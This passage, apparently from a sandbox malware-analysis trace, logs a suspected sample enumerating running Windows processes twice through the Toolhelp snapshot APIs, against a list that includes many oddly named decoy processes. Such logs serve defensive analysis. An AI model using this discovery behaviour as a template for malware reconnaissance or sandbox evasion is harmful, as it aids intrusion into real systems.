th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0119.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0119.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0119.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0119.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0119.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0119.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0119.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0119.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0119.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0119.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0119.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0119.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0119.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0119.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0119.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0119.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0119.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0119.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0119.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0119.557] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0119.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.607] CloseHandle (hObject=0xc4) returned 1 [0119.607] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.614] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.615] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0119.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.622] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.629] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.634] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.639] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0119.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0119.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0119.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0119.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0119.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0119.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0119.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0119.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0119.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0119.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0119.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0119.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0119.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0119.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0119.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0119.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0119.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0119.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0119.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, 